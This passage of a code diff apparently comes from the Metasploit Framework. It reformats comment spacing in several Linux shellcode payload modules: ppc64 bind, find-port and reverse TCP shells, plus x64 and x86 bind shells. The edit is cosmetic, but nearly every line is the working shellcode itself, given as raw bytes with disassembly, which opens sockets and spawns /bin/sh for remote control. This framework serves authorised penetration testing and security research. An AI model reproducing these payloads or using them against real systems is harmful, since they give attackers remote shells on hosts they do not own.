-            "\xfa\xc1\xff\xf9"     +#   stdu    r22,-8(r1)                 #
-            "\xfb\x41\xff\xf9"     +#   stdu    r26,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x03"     +#   addi    r3,r29,-509                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\xfb\x41\xff\xf9"     +#   stdu    r26,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x05"     +#   addi    r3,r29,-507                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x06"     +#   addi    r3,r29,-506                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x75\x1b\x78"     +#   mr      r21,r3                     #
-            "\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
-            "\x7e\xa3\xab\x78"     +#   mr      r3,r21                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <bndsockcode64+148>        #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <bndsockcode64+172>        #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\xf8\xa1\xff\xf9"     +#   stdu    r5,-8(r1)                  #
-            "\xf8\x61\xff\xf9"     +#   stdu    r3,-8(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x3b\x9d\xfe\x02"     + #   addi    r28,r29,-510               #
+            "\x3b\x7d\xfe\x03"     + #   addi    r27,r29,-509               #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\xfb\x81\xff\xf9"     + #   stdu    r28,-8(r1)                 #
+            "\xfb\x61\xff\xf9"     + #   stdu    r27,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x02"     + #   addi    r3,r29,-510                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x7a\x1b\x78"     + #   mr      r26,r3                     #
+            "\x3b\x3d\xfe\x11"     + #   addi    r25,r29,-495               #
+            "\x3e\xe0\xff\x02"     + #   lis     r23,-254                   #
+            "\x62\xf7\x04\xd2"     + #   ori     r23,r23,1234               #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x96\xe1\xff\xfc"     + #   stwu    r23,-4(r1)                 #
+            "\x7c\x36\x0b\x78"     + #   mr      r22,r1                     #
+            "\xfb\x21\xff\xf9"     + #   stdu    r25,-8(r1)                 #
+            "\xfa\xc1\xff\xf9"     + #   stdu    r22,-8(r1)                 #
+            "\xfb\x41\xff\xf9"     + #   stdu    r26,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x03"     + #   addi    r3,r29,-509                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\xfb\x41\xff\xf9"     + #   stdu    r26,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x05"     + #   addi    r3,r29,-507                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x06"     + #   addi    r3,r29,-506                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x75\x1b\x78"     + #   mr      r21,r3                     #
+            "\x7f\x64\xdb\x78"     + #   mr      r4,r27                     #
+            "\x7e\xa3\xab\x78"     + #   mr      r3,r21                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x7b\xff\xff"     + #   addic.  r27,r27,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <bndsockcode64+148>        #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <bndsockcode64+172>        #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\xf8\xa1\xff\xf9"     + #   stdu    r5,-8(r1)                  #
+            "\xf8\x61\xff\xf9"     + #   stdu    r3,-8(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb
@@ -32,47 +32,47 @@ module MetasploitModule
               'CPORT' => [ 86, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x97\xe1\xff\xfc"     +#   stwu    r31,-4(r1)                 #
-            "\x7c\x3c\x0b\x78"     +#   mr      r28,r1                     #
-            "\x3b\x7d\xfe\x11"     +#   addi    r27,r29,-495               #
-            "\x97\x61\xff\xfc"     +#   stwu    r27,-4(r1)                 #
-            "\x7c\x3a\x0b\x78"     +#   mr      r26,r1                     #
-            "\xfb\x41\xff\xf9"     +#   stdu    r26,-8(r1)                 #
-            "\xfb\x81\xff\xf9"     +#   stdu    r28,-8(r1)                 #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\x3b\xff\x01\xff"     +#   addi    r31,r31,511                #
-            "\x3b\xff\xfe\x02"     +#   addi    r31,r31,-510               #
-            "\x38\x21\x01\xff"     +#   addi    r1,r1,511                  #
-            "\x38\x21\xfe\x09"     +#   addi    r1,r1,-503                 #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x08"     +#   addi    r3,r29,-504                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x3b\x3c\x01\xff"     +#   addi    r25,r28,511                #
-            "\xa3\x39\xfe\x03"     +#   lhz     r25,-509(r25)              #
-            "\x28\x19\x04\xd2"     +#   cmplwi  r25,1234                   #
-            "\x40\x82\xff\xd0"     +#   bne+    <fndsockcode64+40>         #
-            "\x3b\x1d\xfe\x03"     +#   addi    r24,r29,-509               #
-            "\x7f\x04\xc3\x78"     +#   mr      r4,r24                     #
-            "\x7f\xe3\xfb\x78"     +#   mr      r3,r31                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x18\xff\xff"     +#   addic.  r24,r24,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <fndsockcode64+96>         #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <fndsockcode64+120>        #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\xf8\xa1\xff\xf9"     +#   stdu    r5,-8(r1)                  #
-            "\xf8\x61\xff\xf9"     +#   stdu    r3,-8(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x97\xe1\xff\xfc"     + #   stwu    r31,-4(r1)                 #
+            "\x7c\x3c\x0b\x78"     + #   mr      r28,r1                     #
+            "\x3b\x7d\xfe\x11"     + #   addi    r27,r29,-495               #
+            "\x97\x61\xff\xfc"     + #   stwu    r27,-4(r1)                 #
+            "\x7c\x3a\x0b\x78"     + #   mr      r26,r1                     #
+            "\xfb\x41\xff\xf9"     + #   stdu    r26,-8(r1)                 #
+            "\xfb\x81\xff\xf9"     + #   stdu    r28,-8(r1)                 #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\x3b\xff\x01\xff"     + #   addi    r31,r31,511                #
+            "\x3b\xff\xfe\x02"     + #   addi    r31,r31,-510               #
+            "\x38\x21\x01\xff"     + #   addi    r1,r1,511                  #
+            "\x38\x21\xfe\x09"     + #   addi    r1,r1,-503                 #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x08"     + #   addi    r3,r29,-504                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x3b\x3c\x01\xff"     + #   addi    r25,r28,511                #
+            "\xa3\x39\xfe\x03"     + #   lhz     r25,-509(r25)              #
+            "\x28\x19\x04\xd2"     + #   cmplwi  r25,1234                   #
+            "\x40\x82\xff\xd0"     + #   bne+    <fndsockcode64+40>         #
+            "\x3b\x1d\xfe\x03"     + #   addi    r24,r29,-509               #
+            "\x7f\x04\xc3\x78"     + #   mr      r4,r24                     #
+            "\x7f\xe3\xfb\x78"     + #   mr      r3,r31                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x18\xff\xff"     + #   addic.  r24,r24,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <fndsockcode64+96>         #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <fndsockcode64+120>        #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\xf8\xa1\xff\xf9"     + #   stdu    r5,-8(r1)                  #
+            "\xf8\x61\xff\xf9"     + #   stdu    r3,-8(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
@@ -33,50 +33,50 @@ module MetasploitModule
               'LPORT'    => [ 62, 'n' ],
             },
           'Payload' =>
-            "\x7f\xff\xfa\x78"     +#   xor     r31,r31,r31                #
-            "\x3b\xa0\x01\xff"     +#   li      r29,511                    #
-            "\x3b\x9d\xfe\x02"     +#   addi    r28,r29,-510               #
-            "\x3b\x7d\xfe\x03"     +#   addi    r27,r29,-509               #
-            "\xfb\xe1\xff\xf9"     +#   stdu    r31,-8(r1)                 #
-            "\xfb\x81\xff\xf9"     +#   stdu    r28,-8(r1)                 #
-            "\xfb\x61\xff\xf9"     +#   stdu    r27,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x02"     +#   addi    r3,r29,-510                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7c\x7a\x1b\x78"     +#   mr      r26,r3                     #
-            "\x3b\x3d\xfe\x11"     +#   addi    r25,r29,-495               #
-            "\x3e\xe0\x7f\x00"     +#   lis     r23,32512                  #
-            "\x62\xf7\x00\x01"     +#   ori     r23,r23,1                  #
-            "\x3a\xc0\x04\xd2"     +#   li      r22,1234                   #
-            "\x96\xe1\xff\xfc"     +#   stwu    r23,-4(r1)                 #
-            "\x96\xc1\xff\xfc"     +#   stwu    r22,-4(r1)                 #
-            "\x93\x61\xff\xfe"     +#   stw     r27,-2(r1)                 #
-            "\x7c\x35\x0b\x78"     +#   mr      r21,r1                     #
-            "\xfb\x21\xff\xf9"     +#   stdu    r25,-8(r1)                 #
-            "\xfa\xa1\xff\xf9"     +#   stdu    r21,-8(r1)                 #
-            "\xfb\x41\xff\xf9"     +#   stdu    r26,-8(r1)                 #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x7d\xfe\x04"     +#   addi    r3,r29,-508                #
-            "\x38\x1d\xfe\x67"     +#   addi    r0,r29,-409                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x7f\x64\xdb\x78"     +#   mr      r4,r27                     #
-            "\x7f\x43\xd3\x78"     +#   mr      r3,r26                     #
-            "\x38\x1d\xfe\x40"     +#   addi    r0,r29,-448                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
-            "\x37\x7b\xff\xff"     +#   addic.  r27,r27,-1                 #
-            "\x40\x80\xff\xec"     +#   bge+    <cntsockcode64+108>        #
-            "\x7c\xa5\x2a\x79"     +#   xor.    r5,r5,r5                   #
-            "\x40\x82\xff\xfd"     +#   bnel+   <cntsockcode64+132>        #
-            "\x7f\xc8\x02\xa6"     +#   mflr    r30                        #
-            "\x3b\xde\x01\xff"     +#   addi    r30,r30,511                #
-            "\x38\x7e\xfe\x25"     +#   addi    r3,r30,-475                #
-            "\x98\xbe\xfe\x2c"     +#   stb     r5,-468(r30)               #
-            "\xf8\xa1\xff\xf9"     +#   stdu    r5,-8(r1)                  #
-            "\xf8\x61\xff\xf9"     +#   stdu    r3,-8(r1)                  #
-            "\x7c\x24\x0b\x78"     +#   mr      r4,r1                      #
-            "\x38\x1d\xfe\x0c"     +#   addi    r0,r29,-500                #
-            "\x44\xff\xff\x02"     +#   sc                                 #
+            "\x7f\xff\xfa\x78"     + #   xor     r31,r31,r31                #
+            "\x3b\xa0\x01\xff"     + #   li      r29,511                    #
+            "\x3b\x9d\xfe\x02"     + #   addi    r28,r29,-510               #
+            "\x3b\x7d\xfe\x03"     + #   addi    r27,r29,-509               #
+            "\xfb\xe1\xff\xf9"     + #   stdu    r31,-8(r1)                 #
+            "\xfb\x81\xff\xf9"     + #   stdu    r28,-8(r1)                 #
+            "\xfb\x61\xff\xf9"     + #   stdu    r27,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x02"     + #   addi    r3,r29,-510                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7c\x7a\x1b\x78"     + #   mr      r26,r3                     #
+            "\x3b\x3d\xfe\x11"     + #   addi    r25,r29,-495               #
+            "\x3e\xe0\x7f\x00"     + #   lis     r23,32512                  #
+            "\x62\xf7\x00\x01"     + #   ori     r23,r23,1                  #
+            "\x3a\xc0\x04\xd2"     + #   li      r22,1234                   #
+            "\x96\xe1\xff\xfc"     + #   stwu    r23,-4(r1)                 #
+            "\x96\xc1\xff\xfc"     + #   stwu    r22,-4(r1)                 #
+            "\x93\x61\xff\xfe"     + #   stw     r27,-2(r1)                 #
+            "\x7c\x35\x0b\x78"     + #   mr      r21,r1                     #
+            "\xfb\x21\xff\xf9"     + #   stdu    r25,-8(r1)                 #
+            "\xfa\xa1\xff\xf9"     + #   stdu    r21,-8(r1)                 #
+            "\xfb\x41\xff\xf9"     + #   stdu    r26,-8(r1)                 #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x7d\xfe\x04"     + #   addi    r3,r29,-508                #
+            "\x38\x1d\xfe\x67"     + #   addi    r0,r29,-409                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x7f\x64\xdb\x78"     + #   mr      r4,r27                     #
+            "\x7f\x43\xd3\x78"     + #   mr      r3,r26                     #
+            "\x38\x1d\xfe\x40"     + #   addi    r0,r29,-448                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
+            "\x37\x7b\xff\xff"     + #   addic.  r27,r27,-1                 #
+            "\x40\x80\xff\xec"     + #   bge+    <cntsockcode64+108>        #
+            "\x7c\xa5\x2a\x79"     + #   xor.    r5,r5,r5                   #
+            "\x40\x82\xff\xfd"     + #   bnel+   <cntsockcode64+132>        #
+            "\x7f\xc8\x02\xa6"     + #   mflr    r30                        #
+            "\x3b\xde\x01\xff"     + #   addi    r30,r30,511                #
+            "\x38\x7e\xfe\x25"     + #   addi    r3,r30,-475                #
+            "\x98\xbe\xfe\x2c"     + #   stb     r5,-468(r30)               #
+            "\xf8\xa1\xff\xf9"     + #   stdu    r5,-8(r1)                  #
+            "\xf8\x61\xff\xf9"     + #   stdu    r3,-8(r1)                  #
+            "\x7c\x24\x0b\x78"     + #   mr      r4,r1                      #
+            "\x38\x1d\xfe\x0c"     + #   addi    r0,r29,-500                #
+            "\x44\xff\xff\x02"     + #   sc                                 #
             "/bin/sh"
         }
       ))

--- a/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb
@@ -25,36 +25,36 @@ module MetasploitModule
       'Payload'       =>
         {
           'Payload' =>
-            "\x48\x31\xf6"          +#  xor    %rsi,%rsi
-            "\x48\xf7\xe6"          +#  mul    %rsi
-            "\xff\xc6"              +#  inc    %esi
-            "\x6a\x02"              +#  pushq  $0x2
-            "\x5f"                  +#  pop    %rdi
-            "\xb0\x29"              +#  mov    $0x29,%al
-            "\x0f\x05"              +#  syscall
-            "\x52"                  +#  push   %rdx
-            "\x5e"                  +#  pop    %rsi
-            "\x50"                  +#  push   %rax
-            "\x5f"                  +#  pop    %rdi
-            "\xb0\x32"              +#  mov    $0x32,%al
-            "\x0f\x05"              +#  syscall
-            "\xb0\x2b"              +#  mov    $0x2b,%al
-            "\x0f\x05"              +#  syscall
-            "\x57"                  +#  push   %rdi
-            "\x5e"                  +#  pop    %rsi
-            "\x48\x97"              +#  xchg   %rax,%rdi
-            "\xff\xce"              +#  dec    %esi
-            "\xb0\x21"              +#  mov    $0x21,%al
-            "\x0f\x05"              +#  syscall
-            "\x75\xf8"              +#  jne    40009f
-            "\x52"                  +#  push   %rdx
-            "\x48\xbf\x2f\x2f\x62"  +#  movabs $0x68732f6e69622f2f,%rdi
+            "\x48\x31\xf6"          + #  xor    %rsi,%rsi
+            "\x48\xf7\xe6"          + #  mul    %rsi
+            "\xff\xc6"              + #  inc    %esi
+            "\x6a\x02"              + #  pushq  $0x2
+            "\x5f"                  + #  pop    %rdi
+            "\xb0\x29"              + #  mov    $0x29,%al
+            "\x0f\x05"              + #  syscall
+            "\x52"                  + #  push   %rdx
+            "\x5e"                  + #  pop    %rsi
+            "\x50"                  + #  push   %rax
+            "\x5f"                  + #  pop    %rdi
+            "\xb0\x32"              + #  mov    $0x32,%al
+            "\x0f\x05"              + #  syscall
+            "\xb0\x2b"              + #  mov    $0x2b,%al
+            "\x0f\x05"              + #  syscall
+            "\x57"                  + #  push   %rdi
+            "\x5e"                  + #  pop    %rsi
+            "\x48\x97"              + #  xchg   %rax,%rdi
+            "\xff\xce"              + #  dec    %esi
+            "\xb0\x21"              + #  mov    $0x21,%al
+            "\x0f\x05"              + #  syscall
+            "\x75\xf8"              + #  jne    40009f
+            "\x52"                  + #  push   %rdx
+            "\x48\xbf\x2f\x2f\x62"  + #  movabs $0x68732f6e69622f2f,%rdi
             "\x69\x6e\x2f\x73\x68"  +
-            "\x57"                  +#  push   %rdi
-            "\x54"                  +#  push   %rsp
-            "\x5f"                  +#  pop    %rdi
-            "\xb0\x3b"              +#  mov    $0x3b,%al
-            "\x0f\x05"               #  syscall
+            "\x57"                  + #  push   %rdi
+            "\x54"                  + #  push   %rsp
+            "\x5f"                  + #  pop    %rdi
+            "\xb0\x3b"              + #  mov    $0x3b,%al
+            "\x0f\x05"                #  syscall
         }
       ))
   end

--- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
@@ -39,48 +39,48 @@ module MetasploitModule
           # and causing execution to fall off the end of the shellcode,
           # bursting into flames. See #7216, #7224
           'Payload' =>
-            "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-            "\xf7\xe3"             +#   mull    %ebx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x43"                 +#   incl    %ebx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\xb0\x66"             +#   movb    $0x66,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x5b"                 +#   popl    %ebx                       #
-            "\x5e"                 +#   popl    %esi                       #
-            "\x52"                 +#   pushl   %edx                       #
-            "\x68\x02\x00\x04\xd2" +#   pushl   $0xd2040200                #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x51"                 +#   pushl   %ecx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\x6a\x66"             +#   pushl   $0x66                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x89\x41\x04"         +#   movl    %eax,0x04(%ecx)            #
-            "\xb3\x04"             +#   movb    $0x04,%bl                  #
-            "\xb0\x66"             +#   movb    $0x66,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x43"                 +#   incl    %ebx                       #
-            "\xb0\x66"             +#   movb    $0x66,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x93"                 +#   xchgl   %eax,%ebx                  #
-            "\x59"                 +#   popl    %ecx                       #
-            "\x6a\x3f"             +#   pushl   $0x3f                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x49"                 +#   decl    %ecx                       #
-            "\x79\xf8"             +#   jns     <bndsockcode+50>           #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\xb0\x0b"             +#   movb    $0x0b,%al                  #
-            "\xcd\x80"              #   int     $0x80                      #
+            "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+            "\xf7\xe3"             + #   mull    %ebx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x43"                 + #   incl    %ebx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\xb0\x66"             + #   movb    $0x66,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x5b"                 + #   popl    %ebx                       #
+            "\x5e"                 + #   popl    %esi                       #
+            "\x52"                 + #   pushl   %edx                       #
+            "\x68\x02\x00\x04\xd2" + #   pushl   $0xd2040200                #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x51"                 + #   pushl   %ecx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\x6a\x66"             + #   pushl   $0x66                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x89\x41\x04"         + #   movl    %eax,0x04(%ecx)            #
+            "\xb3\x04"             + #   movb    $0x04,%bl                  #
+            "\xb0\x66"             + #   movb    $0x66,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x43"                 + #   incl    %ebx                       #
+            "\xb0\x66"             + #   movb    $0x66,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x93"                 + #   xchgl   %eax,%ebx                  #
+            "\x59"                 + #   popl    %ecx                       #
+            "\x6a\x3f"             + #   pushl   $0x3f                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x49"                 + #   decl    %ecx                       #
+            "\x79\xf8"             + #   jns     <bndsockcode+50>           #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\xb0\x0b"             + #   movb    $0x0b,%al                  #
+            "\xcd\x80"               #   int     $0x80                      #
         }
       ))
   end

--- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb
@@ -25,37 +25,37 @@ module MetasploitModule
       'Payload'       =>
         {
           'Payload' =>
-            "\x31\xdb"              +#  xor    %ebx,%ebx
-            "\xf7\xe3"              +#  mul    %ebx
-            "\xb0\x66"              +#  mov    $0x66,%al
-            "\x43"                  +#  inc    %ebx
-            "\x52"                  +#  push   %edx
-            "\x53"                  +#  push   %ebx
-            "\x6a\x02"              +#  push   $0x2
-            "\x89\xe1"              +#  mov    %esp,%ecx
-            "\xcd\x80"              +#  int    $0x80
-            "\x52"                  +#  push   %edx
-            "\x50"                  +#  push   %eax
-            "\x89\xe1"              +#  mov    %esp,%ecx
-            "\xb0\x66"              +#  mov    $0x66,%al
-            "\xb3\x04"              +#  mov    $0x4,%bl
-            "\xcd\x80"              +#  int    $0x80
-            "\xb0\x66"              +#  mov    $0x66,%al
-            "\x43"                  +#  inc    %ebx
-            "\xcd\x80"              +#  int    $0x80
-            "\x59"                  +#  pop    %ecx
-            "\x93"                  +#  xchg   %eax,%ebx
-            "\x6a\x3f"              +#  push   $0x3f
-            "\x58"                  +#  pop    %eax
-            "\xcd\x80"              +#  int    $0x80
-            "\x49"                  +#  dec    %ecx
-            "\x79\xf8"              +#  jns    20
-            "\xb0\x0b"              +#  mov    $0xb,%al
-            "\x68\x2f\x2f\x73\x68"  +#  push   $0x68732f2f
-            "\x68\x2f\x62\x69\x6e"  +#  push   $0x6e69622f
-            "\x89\xe3"              +#  mov    %esp,%ebx
-            "\x41"                  +#  inc    %ecx
-            "\xcd\x80"               #  int    $0x80
+            "\x31\xdb"              + #  xor    %ebx,%ebx
+            "\xf7\xe3"              + #  mul    %ebx
+            "\xb0\x66"              + #  mov    $0x66,%al
+            "\x43"                  + #  inc    %ebx
+            "\x52"                  + #  push   %edx
+            "\x53"                  + #  push   %ebx
+            "\x6a\x02"              + #  push   $0x2
+            "\x89\xe1"              + #  mov    %esp,%ecx
+            "\xcd\x80"              + #  int    $0x80
+            "\x52"                  + #  push   %edx
+            "\x50"                  + #  push   %eax
+            "\x89\xe1"              + #  mov    %esp,%ecx
+            "\xb0\x66"              + #  mov    $0x66,%al
+            "\xb3\x04"              + #  mov    $0x4,%bl
+            "\xcd\x80"              + #  int    $0x80
+            "\xb0\x66"              + #  mov    $0x66,%al
+            "\x43"                  + #  inc    %ebx
+            "\xcd\x80"              + #  int    $0x80
+            "\x59"                  + #  pop    %ecx
+            "\x93"                  + #  xchg   %eax,%ebx
+            "\x6a\x3f"              + #  push   $0x3f
+            "\x58"                  + #  pop    %eax
+            "\xcd\x80"              + #  int    $0x80
+            "\x49"                  + #  dec    %ecx
+            "\x79\xf8"              + #  jns    20
+            "\xb0\x0b"              + #  mov    $0xb,%al
+            "\x68\x2f\x2f\x73\x68"  + #  push   $0x68732f2f
+            "\x68\x2f\x62\x69\x6e"  + #  push   $0x6e69622f
